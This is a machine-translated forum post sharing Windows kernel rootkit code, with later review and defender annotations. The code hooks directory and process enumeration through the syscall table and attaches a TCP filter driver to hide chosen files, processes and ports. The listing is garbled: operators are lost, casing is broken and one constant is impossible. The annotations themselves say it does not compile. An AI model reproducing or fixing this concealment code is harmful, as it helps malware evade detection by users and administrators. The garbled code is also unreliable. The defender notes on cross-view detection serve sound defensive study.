Hide any process, directory file, registry, port


Hide any process, directory file, registry, port

Hide any process, directory / file, registry, port

Enumerating processes, directories/files, registry keys and so on in the operating system eventually calls ZwQueryDirectoryFile, ZwQuerySystemInformation,

ZwxxValueKey and other functions. To intercept these functions for hiding purposes, you need to implement replacements for them and modify the syscall table that the system maintains,

so that the syscall escapes to the function predefined in advance. Because the syscall table is not visible from user mode, a driver has to be written at Ring 0 before it

can be modified. There are already detailed articles on how to perform the modification, so it is not described here. (See Sysinternals.com or the article that Webcrazy

wrote). Port lookup is a TDI query. TDI exports two devices, // device // TCP and // device // UDP. We can take advantage of that by

writing a device filter driver that takes over all IRP packets sent to those two devices before handing them on to the lower driver, which achieves

the purpose of hiding any port. None of the methods above are new; they are technologies from N years ago. Well, I am posting them now anyway.

Just filling out the board a little; don't mind it. Below are the process-, directory/file- and port-hiding code snippets from my driver.

(The registry part is based on Regmon and is not listed here.)

// 64-bit file time split into a low and a high DWORD, the same shape as the
// Win32 FILETIME structure. Identifier casing is as the listing gave it; the
// listing is machine-translated and does not compile as written.
TypeDef struct _filetime

{

DWORD DWLOWDATETIME;

DWORD DWHIGHDATETIME;

} Filetime;

// Per-entry layout that the directory hook below assumes for the buffer
// returned by ZwQueryDirectoryFile: a byte offset to the next entry
// (DWLENTONEXT, 0 on the last entry), attributes, three timestamps, sizes,
// then the name fields; Suname is the variable-length name the hook compares.
// NOTE(review): this is a hand-written layout with unnamed "unknown" gaps; the
// hook below applies it regardless of which FileInfoClass the caller asked
// for, so a class with a different record shape would be walked with the
// wrong stride.
Typedef struct _direntry

{

DWORD DWLENTONEXT;

DWORD DWATTR;

Filetime FTCREATE, FTLASTACCESS, FTLASTWRITE

DWORD DWUNKNOWN [2];

DWORD DWFILESZELOW;

DWORD DWFILESIGH;

DWORD dwunknown2 [3];

Word wnamelen;

Word wunknown;

DWORD DWUNKNOWN3;

Word wshortnamelen;

Wchar SWSHORTNAME [12];

Wchar Suname [1];

Direntry, * pdirentry;

// Per-thread record embedded at the tail of _system_processes (the throughs[]
// member). Presumably mirrors the system thread-information layout for the
// author's target OS version — not validated anywhere in the listing, and the
// process hook below never reads these fields. Closing brace lacks its ';'
// in the listing.
Struct _system_threads

{

Large_integer kernetime;

Large_integer usertime;

Large_integer createtime;

Ulong Waittime;

Pvoid ​​Startaddress;

Client_id clientis;

KPRIORITY PRIORITY

KPRIORITY BASEPRIORITY

Ulong contextswitchcount;

Ulong threadState;

Kwait_reason waitreason;

}

// Process record the process hook below walks. Only two members are used by
// that hook: nextentryDelta, the byte offset from this record to the next one
// (0 on the last record), and — presumably, via an ANSI conversion that the
// listing does not show — processname, which is compared against the hide
// list. Presumably the SYSTEM_PROCESS_INFORMATION layout of the author's
// target OS; confirm before relying on field offsets. Closing brace lacks
// its ';' in the listing.
Struct _system_processes

{

Ulong nextentryDelta;

Ulong threadcount;

Ulong reserved [6];

Large_integer createtime;

Large_integer usertime;

Large_integer kernetime;

Unicode_string processname;

KPRIORITY BASEPRIORITY

Ulong processid;

Ulong inheritedFromProcessId;

Ulong handlecount;

Ulong reserved2 [2]; vm_counters vmcounters;

IO_COUNTERS IOCOUNTERS;

Struct _system_threads throughs [1];

}

// Hidden Directory / File

// Replacement for the ZwQueryDirectoryFile service-table entry. It calls the
// saved original (OldzwQueryDirectoryFile), then rewrites the listing the
// original produced so that entries whose name matches a PTR_HIDEDIR item of
// the driver's list (list_head, Ptr->Next/Flag/Name — defined elsewhere) are
// unlinked or overwritten in place. Parameters are those of
// ZwQueryDirectoryFile; the return value is the original's status except in
// the "only entry is hidden" case below.
// The listing is machine-translated: the '(' after the function name, several
// '+' operators and the loop condition were lost; the code is kept as found
// and only commented.
// Defender note: the filtering happens after the real call, inside this hook
// only, so the on-disk directory still contains the entries. Enumerating the
// same directory through a path that does not go through the (patched)
// service-table entry and diffing the two results — a cross-view check — is
// what exposes this kind of hook; so does comparing the service-table entry
// against the kernel image's own export.
NTSTATUS HOOKZWQUERYDIRECTORYFILE

In Handle Hfile,

In Handle HEVENT OPTIONAL,

In Pio_APC_Routine IoapCroutine Optional,

In Pvoid ​​IoapcContext Optional,

OUT PIO_STATUS_BLOCK PIOSTATUSBLOCK,

Out pvoid fileinformationBuffer,

In Ulong FileinformationBufferlength,

IN file_information_class fileinfoclass,

In Boolean Breturnonlyneentry,

In Punicode_String Pathmask Optional,

In Boolean BrestartQuery)

{

NTSTATUS RC;

// APROCESSNAME, Parentdirectory, BYTESRETURNED and Object are declared but
// never used in what the listing shows.
CHAR APROCESSNAME [80];

ANSI_STRING ANSIFILENAME, ANSIDIRNAME

Unicode_string unifilename;

PP_DIR PTR;

Wchar Parentdirectory [1024] = {0};

INT BYTESRETURNED;

PVOID Object;

// Let the real ZwQueryDirectoryFile fill the caller's buffer first.
RC = ((zwquerydirectoryfile) (OldzwQueryDirectoryFile))

Hfile,

HEVENT,

IOAPCROUTINE,

IOAPCCONTEXT,

Piostatusblock,

FileInformationBuffer,

FileInformationBufferlength,

FileInfoclass,

BreturnonlyoneTry,

Pathmask,

BRESTARTQUERY);

// Only a successful call leaves a listing worth rewriting.
IF (NT_Success (RC))

{

PDIRENTRY P;

PDIRENTRY PLAST;

Bool Blastone;

Int Found;

p = (pdirentry) fileinformationBuffer; // view the returned buffer as a chain of Direntry records

Plast = NULL;

DO

{

// DWLENTONEXT == 0 marks the last record in the buffer.
Blastone =! (P-> dwlentonext);

// Two ANSI copies of the entry name are allocated by the RTL calls
// (AllocateDestinationString = TRUE); the second is then upper-cased into
// the first. NOTE(review): both are freed once, after the loop, so every
// iteration except the last leaks its allocations.
RTLINITUNICODESTRING (& UNIFILENAME, P-> Suname);

RTLUNICODESTRINGTOANSISTRING (& AnsifileName, & UnifileName, True);

RTLUNICODESTRINGTOANSISTRING (& ANSIDIRNAME, & UNIFILENAME, TRUE);

RTLUPPERSTRING (& ANSIFILENAME, & ANSIDIRNAME);

Found = 0;

// Does the upper-cased entry name match any PTR_HIDEDIR item? Only
// strlen(Ptr->Name) bytes are compared, i.e. a prefix match.
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEDIR) Continue;

IF (RTLCompareMemory (ANSIFILENAME.BUFFER, PTR-> Name, Strlen (Ptr-> Name)) == Strlen (Ptr-> Name))

{

FOUND = 1;

Break;

}

} // end for

// NOTE(review): the `if (Found)` guarding the block below was swallowed into
// the following comment line by the translation; kept as found.
// If the list contains the current directory, hide if (Found)

{

// Matching record is the last one: if it is also the only one, report the
// listing as empty through RC; otherwise cut it off by terminating the
// previous record's chain. Either way the walk ends here.
IF (Blastone)

{

IF (p == (pdirentry) fileinformationBuffer

{

// NOTE(review): 0x8000000006 is 36 bits wide and cannot be a 32-bit
// NTSTATUS — garbled literal, kept as found.
Rc = 0x8000000006; // Hide

}

Else

Plast-> DWLENTONEXT = 0;

Break;

}

Else

{

// Matching record has a successor: slide the rest of the buffer down over
// it. IPOS = offset of this record, ILEFT = bytes after it up to the buffer
// length (no guard against ILEFT going negative). The '+' in the source
// address was lost in translation.
INT IPOS = (Ulong) P) - (Ulong) FileinformationBuffer;

INT ILEFT = (DWORD) FILEINFORMATIONBUFFERLENGTH - IPOS - P-> DWLENTONEXT;

RTLCopyMemory (PVOID) P, (PVOID) ((char *) p p-> dwlentonext), (DWORD) ILEFT);

// Re-examine the record that now sits at P without advancing.
CONTINUE;

}

}

// Advance to the next record ('+' lost in translation).
Plast = P;

P = (PDIRENTRY) ((char *) P P-> dwlentonext);

// Loop condition survived only as `!!`; Blastone, computed above, is the
// obvious candidate but the listing does not say.
} while (!!);

// Frees only the last iteration's allocations (see note above).
RTLFreeansString (& ANSIDIRNAME);

RTLFreeansString (& ANSIFILENAME);

}

Return (RC);

}

// Hidden process

// Replacement for the ZwQuerySystemInformation service-table entry. It forwards
// to the saved original (OldzwQuerySystemInformation) and, when the class is 5
// (SystemProcessInformation), walks the returned _system_processes chain and
// unlinks records whose name matches a PTR_HIDEPROC item of the driver's list
// by editing the previous record's nextentryDelta. Parameters and return value
// are those of ZwQuerySystemInformation.
// The listing is machine-translated: the '(' after the function name, the
// pointer-advance operators and one condition were lost; it is kept as found.
// Defender note: only this enumeration path is edited — the process object,
// its threads and handles still exist — so listing processes by a route that
// does not go through the patched service-table entry and diffing against
// this API is the standard cross-view check; an integrity check of the
// service table against the kernel image catches the hook itself.
NTSTATUS HOOKZWQUERYSYSTEMINFORMATION

In Ulong SystemInformationClass,

In Pvoid ​​SystemInformation,

In Ulong SystemInformationLength,

OUT Pulong ReturnLength)

{

NTSTATUS RC;

// NOTE(review): nothing in the listing fills Process_name from
// curr->processname before it is compared below; the other three ANSI
// strings and APROCESSNAME are never used.
ANSI_STRING Process_name, process_uname, process_name1, process_name2;

// Declared as a local that is always true, so the flag has no effect here.
Bool g_hide_proc = true;

CHAR APROCESSNAME [80];

PP_DIR PTR;

Int Found;

// Let the real ZwQuerySystemInformation fill the caller's buffer first.
RC = ((zwQuerySystemInformation) (OldzwQuerySystemInformation))

SystemInformationClass,

SystemInformation,

SystemInformationLength,

ReturnLength;

IF (NT_Success (RC))

{

// Class 5 is SystemProcessInformation; other classes pass through untouched.
IF (g_hide_proc && (5 == systeminformationClass))

{

// View the returned buffer as a chain of _system_processes records.
Struct _system_processes * curr = (struct _system_processes *) SystemInformation;

Struct _system_processes * prev = null;

// Walk every process record.
While (Curr)

{

// Condition garbled (`0 process_name.length`); the operator was lost.
IF ((0 process_name.length))

{

Found = 0;

// Does the process name match any PTR_HIDEPROC item? Only
// strlen(Ptr->Name) bytes are compared.
For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;

IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)

{

FOUND = 1;

}

}

// Unlink the matching record from the chain, repeating while the record
// that follows also matches.
While (Found) {

IF (prev)

{

// A previous record exists: point it past the current one.
IF (Curr-> NEXTENTRYDELTA)

{

Prev-> NEXTENTRYDELTA = CURR-> NEXTENTRYDELTA;

}

Else

{

Prev-> NEXTENTRYDELTA = 0;

}

}

Else

{

// First record matches: the code moves the local SystemInformation
// pointer instead. NOTE(review): the assignment stores the delta itself
// rather than advancing by it (operator lost in translation), and
// SystemInformation is a by-value parameter here.
IF (Curr-> NEXTENTRYDELTA)

{

(char *) Systeminformation = curr-> nextentryDelta;

}

Else

{

Systeminformation = NULL;

}

}

// Advance to the next record, or stop at the end of the chain
// (pointer arithmetic garbled in the listing).
IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);

Else

{

Curr = NULL; BREAK;

}

// Re-run the list match for the record now at Curr. NOTE(review):
// Process_name is not refreshed for the new record in what is shown.
Found = 0;

For (ptr = list_head; ptr! = null; ptr = ptr-> Next)

{

IF (Ptr-> Flag! = PTR_HIDEPROC) Continue;

IF (Memcmp (Process_name.buffer, Ptr-> Name, Strlen (Ptr-> Name)) == 0)

{

FOUND = 1;

}

}

}

}

// Normal advance: remember this record as prev and step to the next one
// (pointer arithmetic garbled in the listing).
IF (Curr! = null)

{

Prev = CURR;

IF (Curr-> NEXTENTRYDELTA) (CHAR *) CURR = CURR-> NEXTENTRYDELTA);

Else Curr = NULL;

}

}

}

}

Return (RC);

}

// Hide port

// Fragment of the driver-initialisation path. The enclosing routine's header
// is not in the listing, nor are the declarations of driverObject, fileObject
// and i that it uses. What is shown: look up the existing TCP device by name
// (the backslashes of the device-name literal were turned into slashes by the
// translation), create a filter device with a Device_extension-sized
// extension, attach it on top of the TCP device stack, and route every
// major-function slot the driver left at its default to PASSTHROUGH.
// Defender note: a filter attached with IoAttachDeviceToDeviceStack is visible
// in the TCP device object's attached-device chain, which is what device-stack
// walkers enumerate; an unexpected device sitting above the TCP device is the
// indicator.
PDEvice_Object M_TcpGetDevice;

PDEvice_Object TcpDevice;

Unicode_string tcpDeviceName;

// NOTE(review): TCPDRIVER is declared but never assigned in what is shown,
// yet it is dereferenced in the loop below.
PDRIVER_OBJECT TCPDRIVER;

PDEvice_Object TCPGETDEVICE;

PDEvice_Object FilterDevice

PDRIVER_DISPATCH EMPTY;

NTSTATUS STATUS;

// Remember the handler installed for IRP_MJ_CREATE; slots still equal to it
// are treated below as "not set by this driver".
Empty = driverObject-> majorfunction [IRP_MJ_CREATE];

RTLINITUNICODESTRING (& TCPDeviceName, L "// device // tcp");

// Obtain the TCP device object by name; this also takes a reference on a
// file object (FileObject) that must be dropped later.
Status = IOGETDEVICEOBJECTPOINTER (& TCPDeviceName,

FILE_ALL_ACCESS,

& FileObject,

& TcpDevice

);

IF (! NT_Success (status))

{

DBGPrint ("IOGETDEVICEOBJECTPOINTER ERROR! / N");

Return status;

}

DBGPRINT ("IOGETDEVICEOBJECTPOINTER OK! / N");

// Create the filter device object.
Status = IOCREATEVICE (DriverObject,

SIZEOF (Device_extension),

NULL,

File_Device_unknown,

0,

False,

& Filterdevice

);

IF (! NT_Success (status))

{

// NOTE(review): returns without dropping the file-object reference taken
// above.
Return status;

}

// Attach the filter on top of the TCP device stack; the returned pointer is
// the device the filter must forward IRPs to.
TCPGETDEVICE = IoattachDeviceTodeviceStack (FilterDevice, TCPDevice);

IF (! tcpgetDevice) {

IodeleteDevice (FilterDevice);

DBGPrint ("IoattachDeventodeviceStack Error! / N");

// NOTE(review): reports success although the attach failed, and again
// leaves the file-object reference outstanding.
Return status_success;

}

m_tcpgetDevice = tcpgetDevice;

// Install PASSTHROUGH in every major-function slot this driver left at its
// default. The loop bound and the first operand of the condition were lost
// in translation.
For (i = 0; i

{

IF ((tcpdriver-> majorfunction "&& (driverObject-> majorfunction [i] == empty))

{

DriverObject-> majorfunction [i] = passthrough;

}

}

// Drop the file-object reference taken by IoGetDeviceObjectPointer.
ObdereferenceObject (fileObject);

// Dispatch routine installed in the filter's major-function slots. For IRPs
// whose device-control code equals query_information_ex (presumably the TCP
// query-information IOCTL that netstat-style tools issue — confirm against
// the header it comes from) the request is completed here with
// status_success and no data; every other IRP is copied to the next stack
// location, given GenericCompletion (defined elsewhere) as completion routine
// and forwarded to the device the filter was attached to (M_TcpGetDevice).
// NOTE(review): the IOCTL code field is read for every IRP regardless of its
// major function, and IoStatus.Information is never set before completion.
// Defender note: as written, every matching query is answered empty, not just
// queries about particular ports — so local port listings from user mode come
// back empty while a listen from a remote scan still succeeds; that
// discrepancy is the observable.
NTSTATUS PASSTHROUGH (in PDEvice_Object DeviceObject, in PIRP IRP)

{

// STATUS is declared but never used in what is shown.
NTSTATUS STATUS;

PIO_STACK_LOCATION PIRPSTACK;

PirPstack = IOGETCURRENTIRPSTACKLOCATION (IRP);

// Query requests are completed here and never reach the TCP driver.
IF (pirpstack-> parameters.deviceioControl.iocontrolcode == query_information_ex)

{

// No per-port check is done: the request is simply completed with success
// and no output.
IRP-> iostatus.status = status_success;

IOCOMPLETEREQUEST (IRP, IO_NO_INCREMENT);

Return status_success;

}

// Everything else: pass the current stack location down unchanged and ask
// for GenericCompletion on success, error and cancel.
IocopyCurrentirPstackLocationToneXT (IRP);

IOSetCompletionRoutine (IRP,

GenericCompletion,

NULL,

True,

True,

True

);

// Forward to the device below the filter.
Return IocallDriver (M_TcpGetDevice, IRP);

}
